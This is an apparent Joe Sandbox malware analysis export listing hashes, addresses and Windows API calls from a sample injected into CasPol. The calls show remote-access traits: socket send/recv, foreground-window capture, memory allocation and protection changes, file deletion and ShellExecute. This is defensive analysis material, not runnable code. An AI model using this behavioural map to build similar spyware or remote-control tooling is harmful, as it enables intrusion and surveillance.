                                                                                                                  • API String ID: 1925916568-3351567749
                                                                                                                  • Opcode ID: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                  • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                  • Opcode Fuzzy Hash: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                  • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: 8bdb47dcc075b90602d862ed2636d4bb920ab298b1725c427e8c8ce9e7e6604e
                                                                                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                  • Opcode Fuzzy Hash: 8bdb47dcc075b90602d862ed2636d4bb920ab298b1725c427e8c8ce9e7e6604e
                                                                                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                  • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                  • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                  • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: xAG
                                                                                                                  • API String ID: 176396367-2759412365
                                                                                                                  • Opcode ID: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                  • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                                  • Opcode Fuzzy Hash: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                  • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                  • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                  • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                  • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                  • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 0044B9EF
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FE7,00000000,0000000F,0042EA4D,?,?,00430AB6,?,00000000), ref: 0044BA2B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1482568997-0
                                                                                                                  • Opcode ID: 6d1be577c9a35bc0b28deeed51393a067267046c1d6c489358c9943441165e26
                                                                                                                  • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                                                                                                  • Opcode Fuzzy Hash: 6d1be577c9a35bc0b28deeed51393a067267046c1d6c489358c9943441165e26
                                                                                                                  • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                                                                                                  APIs
                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1953588214-0
                                                                                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                  APIs
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                                    • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,?,00433E19,00000000,00000000,?,?,?,?,?,?,00433E19,?,0046D5EC), ref: 00437C47
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3476068407-0
                                                                                                                  • Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                  • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                                  • Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                  • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0041AC84
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 29597999-0
                                                                                                                  • Opcode ID: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                  • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                                                                                                  • Opcode Fuzzy Hash: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                  • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                                                                                                  APIs
                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                    • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1170566393-0
                                                                                                                  • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                  • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                                                                                                  • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                  • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                  • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                  • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                  • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                  • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                                                                                  • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                  • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Startup
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 724789610-0
                                                                                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: recv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1507349165-0
                                                                                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2809346765-0
                                                                                                                  • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                  • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                  • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                  • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Deallocate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1075933841-0
                                                                                                                  • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                  • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                  • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                  • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                  • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                  • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                  • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                                                  APIs
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00406F28
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                    • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                    • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                    • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
